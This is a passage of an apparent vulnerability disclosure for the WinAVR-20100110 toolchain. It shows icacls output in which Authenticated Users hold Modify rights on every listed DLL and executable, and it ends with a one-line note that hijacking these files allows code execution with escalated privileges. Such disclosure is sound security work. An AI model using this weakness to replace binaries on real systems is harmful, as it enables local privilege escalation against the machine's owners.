  BUILTIN\Users:(I)(OI)(CI)(RX)
  NT AUTHORITY\Authenticated Users:(I)(M)
  NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)

Successfully processed 1 files; Failed processing 0 files
PS C:\WinAVR-20100110\bin> icacls.exe *.dll
cygwin1.dll BUILTIN\Administrators:(I)(F)
            NT AUTHORITY\SYSTEM:(I)(F)
            BUILTIN\Users:(I)(RX)
            NT AUTHORITY\Authenticated Users:(I)(M)

itcl32.dll BUILTIN\Administrators:(I)(F)
           NT AUTHORITY\SYSTEM:(I)(F)
           BUILTIN\Users:(I)(RX)
           NT AUTHORITY\Authenticated Users:(I)(M)

itk32.dll BUILTIN\Administrators:(I)(F)
          NT AUTHORITY\SYSTEM:(I)(F)
          BUILTIN\Users:(I)(RX)
          NT AUTHORITY\Authenticated Users:(I)(M)

libusb0.dll BUILTIN\Administrators:(I)(F)
            NT AUTHORITY\SYSTEM:(I)(F)
            BUILTIN\Users:(I)(RX)
            NT AUTHORITY\Authenticated Users:(I)(M)

tcl84.dll BUILTIN\Administrators:(I)(F)
          NT AUTHORITY\SYSTEM:(I)(F)
          BUILTIN\Users:(I)(RX)
          NT AUTHORITY\Authenticated Users:(I)(M)

tclpip84.dll BUILTIN\Administrators:(I)(F)
             NT AUTHORITY\SYSTEM:(I)(F)
             BUILTIN\Users:(I)(RX)
             NT AUTHORITY\Authenticated Users:(I)(M)

tk84.dll BUILTIN\Administrators:(I)(F)
         NT AUTHORITY\SYSTEM:(I)(F)
         BUILTIN\Users:(I)(RX)
         NT AUTHORITY\Authenticated Users:(I)(M)

Successfully processed 7 files; Failed processing 0 files
PS C:\WinAVR-20100110\bin> icacls.exe *.exe
avarice.exe BUILTIN\Administrators:(I)(F)
            NT AUTHORITY\SYSTEM:(I)(F)
            BUILTIN\Users:(I)(RX)
            NT AUTHORITY\Authenticated Users:(I)(M)

avr-addr2line.exe BUILTIN\Administrators:(I)(F)
                  NT AUTHORITY\SYSTEM:(I)(F)
                  BUILTIN\Users:(I)(RX)
                  NT AUTHORITY\Authenticated Users:(I)(M)

avr-ar.exe BUILTIN\Administrators:(I)(F)
           NT AUTHORITY\SYSTEM:(I)(F)
           BUILTIN\Users:(I)(RX)
           NT AUTHORITY\Authenticated Users:(I)(M)

avr-as.exe BUILTIN\Administrators:(I)(F)
           NT AUTHORITY\SYSTEM:(I)(F)
           BUILTIN\Users:(I)(RX)
           NT AUTHORITY\Authenticated Users:(I)(M)

avr-c++.exe BUILTIN\Administrators:(I)(F)
            NT AUTHORITY\SYSTEM:(I)(F)
            BUILTIN\Users:(I)(RX)
            NT AUTHORITY\Authenticated Users:(I)(M)

avr-c++filt.exe BUILTIN\Administrators:(I)(F)
                NT AUTHORITY\SYSTEM:(I)(F)
                BUILTIN\Users:(I)(RX)
                NT AUTHORITY\Authenticated Users:(I)(M)

avr-cpp.exe BUILTIN\Administrators:(I)(F)
            NT AUTHORITY\SYSTEM:(I)(F)
            BUILTIN\Users:(I)(RX)
            NT AUTHORITY\Authenticated Users:(I)(M)

avr-g++.exe BUILTIN\Administrators:(I)(F)
            NT AUTHORITY\SYSTEM:(I)(F)
            BUILTIN\Users:(I)(RX)
            NT AUTHORITY\Authenticated Users:(I)(M)

avr-gcc-4.3.3.exe BUILTIN\Administrators:(I)(F)
                  NT AUTHORITY\SYSTEM:(I)(F)
                  BUILTIN\Users:(I)(RX)
                  NT AUTHORITY\Authenticated Users:(I)(M)

avr-gcc.exe BUILTIN\Administrators:(I)(F)
            NT AUTHORITY\SYSTEM:(I)(F)
            BUILTIN\Users:(I)(RX)
            NT AUTHORITY\Authenticated Users:(I)(M)

avr-gcov.exe BUILTIN\Administrators:(I)(F)
             NT AUTHORITY\SYSTEM:(I)(F)
             BUILTIN\Users:(I)(RX)
             NT AUTHORITY\Authenticated Users:(I)(M)

avr-gdb.exe BUILTIN\Administrators:(I)(F)
            NT AUTHORITY\SYSTEM:(I)(F)
            BUILTIN\Users:(I)(RX)
            NT AUTHORITY\Authenticated Users:(I)(M)

avr-gprof.exe BUILTIN\Administrators:(I)(F)
              NT AUTHORITY\SYSTEM:(I)(F)
              BUILTIN\Users:(I)(RX)
              NT AUTHORITY\Authenticated Users:(I)(M)

avr-insight.exe BUILTIN\Administrators:(I)(F)
                NT AUTHORITY\SYSTEM:(I)(F)
                BUILTIN\Users:(I)(RX)
                NT AUTHORITY\Authenticated Users:(I)(M)

avr-ld.exe BUILTIN\Administrators:(I)(F)
           NT AUTHORITY\SYSTEM:(I)(F)
           BUILTIN\Users:(I)(RX)
           NT AUTHORITY\Authenticated Users:(I)(M)

avr-nm.exe BUILTIN\Administrators:(I)(F)
           NT AUTHORITY\SYSTEM:(I)(F)
           BUILTIN\Users:(I)(RX)
           NT AUTHORITY\Authenticated Users:(I)(M)

avr-objcopy.exe BUILTIN\Administrators:(I)(F)
                NT AUTHORITY\SYSTEM:(I)(F)
                BUILTIN\Users:(I)(RX)
                NT AUTHORITY\Authenticated Users:(I)(M)

avr-objdump.exe BUILTIN\Administrators:(I)(F)
                NT AUTHORITY\SYSTEM:(I)(F)
                BUILTIN\Users:(I)(RX)
                NT AUTHORITY\Authenticated Users:(I)(M)

avr-ranlib.exe BUILTIN\Administrators:(I)(F)
               NT AUTHORITY\SYSTEM:(I)(F)
               BUILTIN\Users:(I)(RX)
               NT AUTHORITY\Authenticated Users:(I)(M)

avr-readelf.exe BUILTIN\Administrators:(I)(F)
                NT AUTHORITY\SYSTEM:(I)(F)
                BUILTIN\Users:(I)(RX)
                NT AUTHORITY\Authenticated Users:(I)(M)

avr-size.exe BUILTIN\Administrators:(I)(F)
             NT AUTHORITY\SYSTEM:(I)(F)
             BUILTIN\Users:(I)(RX)
             NT AUTHORITY\Authenticated Users:(I)(M)

avr-strings.exe BUILTIN\Administrators:(I)(F)
                NT AUTHORITY\SYSTEM:(I)(F)
                BUILTIN\Users:(I)(RX)
                NT AUTHORITY\Authenticated Users:(I)(M)

avr-strip.exe BUILTIN\Administrators:(I)(F)
              NT AUTHORITY\SYSTEM:(I)(F)
              BUILTIN\Users:(I)(RX)
              NT AUTHORITY\Authenticated Users:(I)(M)

avr32-addr2line.exe BUILTIN\Administrators:(I)(F)
                    NT AUTHORITY\SYSTEM:(I)(F)
                    BUILTIN\Users:(I)(RX)
                    NT AUTHORITY\Authenticated Users:(I)(M)

avr32-ar.exe BUILTIN\Administrators:(I)(F)
             NT AUTHORITY\SYSTEM:(I)(F)
             BUILTIN\Users:(I)(RX)
             NT AUTHORITY\Authenticated Users:(I)(M)

avr32-as.exe BUILTIN\Administrators:(I)(F)
             NT AUTHORITY\SYSTEM:(I)(F)
             BUILTIN\Users:(I)(RX)
             NT AUTHORITY\Authenticated Users:(I)(M)

avr32-c++.exe BUILTIN\Administrators:(I)(F)
              NT AUTHORITY\SYSTEM:(I)(F)
              BUILTIN\Users:(I)(RX)
              NT AUTHORITY\Authenticated Users:(I)(M)

avr32-c++filt.exe BUILTIN\Administrators:(I)(F)
                  NT AUTHORITY\SYSTEM:(I)(F)
                  BUILTIN\Users:(I)(RX)
                  NT AUTHORITY\Authenticated Users:(I)(M)

avr32-cpp.exe BUILTIN\Administrators:(I)(F)
              NT AUTHORITY\SYSTEM:(I)(F)
              BUILTIN\Users:(I)(RX)
              NT AUTHORITY\Authenticated Users:(I)(M)

avr32-g++.exe BUILTIN\Administrators:(I)(F)
              NT AUTHORITY\SYSTEM:(I)(F)
              BUILTIN\Users:(I)(RX)
              NT AUTHORITY\Authenticated Users:(I)(M)

avr32-gcc-4.3.2.exe BUILTIN\Administrators:(I)(F)
                    NT AUTHORITY\SYSTEM:(I)(F)
                    BUILTIN\Users:(I)(RX)
                    NT AUTHORITY\Authenticated Users:(I)(M)

avr32-gcc.exe BUILTIN\Administrators:(I)(F)
              NT AUTHORITY\SYSTEM:(I)(F)
              BUILTIN\Users:(I)(RX)
              NT AUTHORITY\Authenticated Users:(I)(M)

avr32-gcov.exe BUILTIN\Administrators:(I)(F)
               NT AUTHORITY\SYSTEM:(I)(F)
               BUILTIN\Users:(I)(RX)
               NT AUTHORITY\Authenticated Users:(I)(M)

avr32-gdb.exe BUILTIN\Administrators:(I)(F)
              NT AUTHORITY\SYSTEM:(I)(F)
              BUILTIN\Users:(I)(RX)
              NT AUTHORITY\Authenticated Users:(I)(M)

avr32-gprof.exe BUILTIN\Administrators:(I)(F)
                NT AUTHORITY\SYSTEM:(I)(F)
                BUILTIN\Users:(I)(RX)
                NT AUTHORITY\Authenticated Users:(I)(M)

avr32-insight.exe BUILTIN\Administrators:(I)(F)
                  NT AUTHORITY\SYSTEM:(I)(F)
                  BUILTIN\Users:(I)(RX)
                  NT AUTHORITY\Authenticated Users:(I)(M)

avr32-ld.exe BUILTIN\Administrators:(I)(F)
             NT AUTHORITY\SYSTEM:(I)(F)
             BUILTIN\Users:(I)(RX)
             NT AUTHORITY\Authenticated Users:(I)(M)

avr32-nm.exe BUILTIN\Administrators:(I)(F)
             NT AUTHORITY\SYSTEM:(I)(F)
             BUILTIN\Users:(I)(RX)
             NT AUTHORITY\Authenticated Users:(I)(M)

avr32-objcopy.exe BUILTIN\Administrators:(I)(F)
                  NT AUTHORITY\SYSTEM:(I)(F)
                  BUILTIN\Users:(I)(RX)
                  NT AUTHORITY\Authenticated Users:(I)(M)

avr32-objdump.exe BUILTIN\Administrators:(I)(F)
                  NT AUTHORITY\SYSTEM:(I)(F)
                  BUILTIN\Users:(I)(RX)
                  NT AUTHORITY\Authenticated Users:(I)(M)

avr32-ranlib.exe BUILTIN\Administrators:(I)(F)
                 NT AUTHORITY\SYSTEM:(I)(F)
                 BUILTIN\Users:(I)(RX)
                 NT AUTHORITY\Authenticated Users:(I)(M)

avr32-readelf.exe BUILTIN\Administrators:(I)(F)
                  NT AUTHORITY\SYSTEM:(I)(F)
                  BUILTIN\Users:(I)(RX)
                  NT AUTHORITY\Authenticated Users:(I)(M)

avr32-size.exe BUILTIN\Administrators:(I)(F)
               NT AUTHORITY\SYSTEM:(I)(F)
               BUILTIN\Users:(I)(RX)
               NT AUTHORITY\Authenticated Users:(I)(M)

avr32-strings.exe BUILTIN\Administrators:(I)(F)
                  NT AUTHORITY\SYSTEM:(I)(F)
                  BUILTIN\Users:(I)(RX)
                  NT AUTHORITY\Authenticated Users:(I)(M)

avr32-strip.exe BUILTIN\Administrators:(I)(F)
                NT AUTHORITY\SYSTEM:(I)(F)
                BUILTIN\Users:(I)(RX)
                NT AUTHORITY\Authenticated Users:(I)(M)

avrdude.exe BUILTIN\Administrators:(I)(F)
            NT AUTHORITY\SYSTEM:(I)(F)
            BUILTIN\Users:(I)(RX)
            NT AUTHORITY\Authenticated Users:(I)(M)

loaddrv.exe BUILTIN\Administrators:(I)(F)
            NT AUTHORITY\SYSTEM:(I)(F)
            BUILTIN\Users:(I)(RX)
            NT AUTHORITY\Authenticated Users:(I)(M)

simulavr.exe BUILTIN\Administrators:(I)(F)
             NT AUTHORITY\SYSTEM:(I)(F)
             BUILTIN\Users:(I)(RX)
             NT AUTHORITY\Authenticated Users:(I)(M)

splint.exe BUILTIN\Administrators:(I)(F)
           NT AUTHORITY\SYSTEM:(I)(F)
           BUILTIN\Users:(I)(RX)
           NT AUTHORITY\Authenticated Users:(I)(M)

srec_cat.exe BUILTIN\Administrators:(I)(F)
             NT AUTHORITY\SYSTEM:(I)(F)
             BUILTIN\Users:(I)(RX)
             NT AUTHORITY\Authenticated Users:(I)(M)

srec_cmp.exe BUILTIN\Administrators:(I)(F)
             NT AUTHORITY\SYSTEM:(I)(F)
             BUILTIN\Users:(I)(RX)
             NT AUTHORITY\Authenticated Users:(I)(M)

srec_info.exe BUILTIN\Administrators:(I)(F)
              NT AUTHORITY\SYSTEM:(I)(F)
              BUILTIN\Users:(I)(RX)
              NT AUTHORITY\Authenticated Users:(I)(M)

tclsh84.exe BUILTIN\Administrators:(I)(F)
            NT AUTHORITY\SYSTEM:(I)(F)
            BUILTIN\Users:(I)(RX)
            NT AUTHORITY\Authenticated Users:(I)(M)

wish84.exe BUILTIN\Administrators:(I)(F)
           NT AUTHORITY\SYSTEM:(I)(F)
           BUILTIN\Users:(I)(RX)
           NT AUTHORITY\Authenticated Users:(I)(M)

Successfully processed 54 files; Failed processing 0 files
PS C:\WinAVR-20100110\bin>

# Exploit:
This vulnerability could permit executing code with the escalated privileges by hijacking one of the DLLs or *.exe files.